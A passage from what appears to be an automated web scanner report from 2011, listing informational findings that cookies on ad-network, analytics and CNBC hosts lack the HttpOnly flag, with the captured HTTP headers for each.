Host:	http://oracleuniversity.112.2o7.net
Path:	/b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s18104473613862

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

s_vi_x7Fbqsx7Cuex7Eyfubcydi=[CS]v4|273321F405158E8D-6000017680001134|4E6643E7[CE]; Expires=Sun, 4 Sep 2016 16:03:43 GMT; Domain=.2o7.net; Path=/
s_vi_cx7Emox60ikx60cnmx60=[CS]v4|273321F405158E8D-6000017680001136|4E6643E7[CE]; Expires=Sun, 4 Sep 2016 16:03:43 GMT; Domain=.2o7.net; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.130. http://p.brilig.com/contact/bct previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://p.brilig.com
Path:	/contact/bct

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BriligContact=57372788-c194-43c5-a151-713a1d7fc584; Domain=.brilig.com; Expires=Thu, 29-Aug-2041 15:00:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.131. http://pi.pardot.com/analytics previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pi.pardot.com
Path:	/analytics

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

pi_opt_in1852=3c12a2182101972e2629218d; expires=Mon, 06-Sep-2021 15:33:53 GMT; path=/; domain=.pardot.com
visitor_id1852=191471275; expires=Mon, 06-Sep-2021 15:33:53 GMT; path=/; domain=.pardot.com
lpv1852=aHR0cDovL3d3dy56bm9kZS5jb20vem5vZGUtbXVsdGlmcm9udC9mZWF0dXJlLmFzcHg=; expires=Tue, 06-Sep-2011 16:03:53 GMT; path=/; secure

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.132. http://ping.crowdscience.com/ping.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ping.crowdscience.com
Path:	/ping.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

__csv=2a31db5320bf2a6b; Domain=.crowdscience.com; expires=Mon, 05 Dec 2011 15:32:56; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ping.js?url=http%3A%2F%2Fwww.readwriteweb.com%2Fenterprise%2F2010%2F11%2Foracle.php&id=5c5c650d27&u=mozilla%2F5.0%20(windows%20nt%206.1%3B%20wow64)%20applewebkit%2F535.1%20(khtml%2C%20like%20gecko)%20chrome%2F13.0.782.220%20safari%2F535.1&x=1315341159227&c=0&t=0&v=0&m=0&vn=2.0.4 HTTP/1.1
Host: ping.crowdscience.com
Proxy-Connection: keep-alive
Referer: http://www.readwriteweb.com/enterprise/2010/11/oracle.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __csadt_="NSBE647001:|fixed_placement||52487714041||0||1||1"; __csv=2a31db5320bf2a6b

Response

13.133. http://pixel.fetchback.com/serve/fb/pdc previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.fetchback.com
Path:	/serve/fb/pdc

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

cmp=1_1315323148; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
uid=1_1315323148_1315323137705:2485910142863198; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
kwd=1_1315323148; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
sit=1_1315323148; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
cre=1_1315323148; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
bpd=1_1315323148; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
apd=1_1315323148; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
scg=1_1315323148; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
ppd=1_1315323148; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
afl=1_1315323148; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
act=1_1315323148; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.134. http://pixel.quantserve.com/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.quantserve.com
Path:	/pixel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

d=EKwBGAHSB7vRG9iBDYQh8Q; expires=Mon, 05-Dec-2011 15:00:28 GMT; path=/; domain=.quantserve.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.135. http://public.deloitte.com/media/00Global/social_links/dtt_email_16x16.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://public.deloitte.com
Path:	/media/00Global/social_links/dtt_email_16x16.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SITESERVER=ID=0120f21d112bdebcef542549eb84e28a; expires=Monday, 01-Jan-2035 00:00:00 GMT; path=/; domain=.deloitte.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.136. http://r.openx.net/img previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r.openx.net
Path:	/img

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

i=d2a43928-76cd-49ea-b899-b41fb371435f; expires=Thu, 05-Sep-2013 15:32:13 GMT; path=/; domain=.openx.net

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768033/size=300250/u=2/bnum=10667129/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 15:36:31 GMT; path=/
A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768033/size=300250/u=2/bnum=12485207/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 15:46:48 GMT; path=/
A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1069543.768033.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Tue, 06 Sep 2011 15:46:48 GMT
Content-Type: application/x-javascript; charset=utf-8
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 15:46:48 GMT
Content-Length: 996
Connection: close
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 15:46:48 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.write('<iframe src="http://view.atdmt.com/BVK/iview/349019750/direct/01/8665855478?click=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001069543/cstr=12485207=_4e664067,866585
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768033/size=300250/u=2/bnum=18715440/hr=16/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 16:07:26 GMT; path=/
A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1017217.768033.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Tue, 06 Sep 2011 16:07:26 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 561
Date: Tue, 06 Sep 2011 16:07:26 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 16:07:26 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.write('<script language="JavaScript" src="http://d7.zedo.com/jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=1
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768033/size=300250/u=2/bnum=31433009/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 15:51:56 GMT; path=/
A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1017217.768033.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Tue, 06 Sep 2011 15:51:56 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 561
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 15:51:56 GMT
Connection: close
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 15:51:56 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.write('<script language="JavaScript" src="http://d7.zedo.com/jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=3
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768033/size=300250/u=2/bnum=32696846/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 15:26:14 GMT; path=/
A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1017217.768033.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Tue, 06 Sep 2011 15:26:14 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 561
Date: Tue, 06 Sep 2011 15:26:15 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 15:26:14 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.write('<script language="JavaScript" src="http://d7.zedo.com/jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=3
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768033/size=300250/u=2/bnum=41330653/hr=16/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 16:02:17 GMT; path=/
A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1017217.768033.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Tue, 06 Sep 2011 16:02:17 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 561
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 16:02:17 GMT
Connection: close
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 16:02:17 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.write('<script language="JavaScript" src="http://d7.zedo.com/jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=4
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768033/size=300250/u=2/bnum=64844327/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 15:41:40 GMT; path=/
A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1017217.768033.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Tue, 06 Sep 2011 15:41:40 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 561
Date: Tue, 06 Sep 2011 15:41:40 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 15:41:40 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.write('<script language="JavaScript" src="http://d7.zedo.com/jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=6
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768033/size=300250/u=2/bnum=70609416/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 15:21:07 GMT; path=/
A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1017217.768033.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Tue, 06 Sep 2011 15:21:07 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 561
Date: Tue, 06 Sep 2011 15:21:07 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 15:21:07 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.write('<script language="JavaScript" src="http://d7.zedo.com/jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=7
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768033/size=300250/u=2/bnum=7863048/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 15:15:56 GMT; path=/
A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1017217.768033.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Tue, 06 Sep 2011 15:15:56 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 559
Date: Tue, 06 Sep 2011 15:15:56 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 15:15:56 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.write('<script language="JavaScript" src="http://d7.zedo.com/jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=7
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768033/size=300250/u=2/bnum=80753902/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 15:31:23 GMT; path=/
A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1017217.768033.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Tue, 06 Sep 2011 15:31:23 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 561
Date: Tue, 06 Sep 2011 15:31:23 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 15:31:23 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.write('<script language="JavaScript" src="http://d7.zedo.com/jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=8
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768033/size=300250/u=2/bnum=92276994/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 15:57:07 GMT; path=/
A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1017217.768033.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Tue, 06 Sep 2011 15:57:07 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 561
Date: Tue, 06 Sep 2011 15:57:07 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 15:57:07 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.write('<script language="JavaScript" src="http://d7.zedo.com/jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=9
...[SNIP]...

13.148. http://register.cnbc.com/forgotPassword.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://register.cnbc.com
Path:	/forgotPassword.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_80=834785856.20480.0000; expires=Tue, 06-Sep-2011 18:01:48 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /forgotPassword.do HTTP/1.1
Host: register.cnbc.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; JSESSIONID=7FFDB885E3232AE9759F6D0A6D01E627; s_cc=true; s_nr=1315339307081; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSign-in%25257CDefault%25257CSite%252520Sign-in%252520Page%2526pidt%253D1%2526oid%253Dhttp%25253A//register.cnbc.com/forgotpassword1.jsp%2526ot%253DA

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 15:01:48 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Location: https://register.cnbc.com/forgotPassword.do
Content-Length: 227
Connection: close
Content-Type: text/html; charset=iso-8859-1
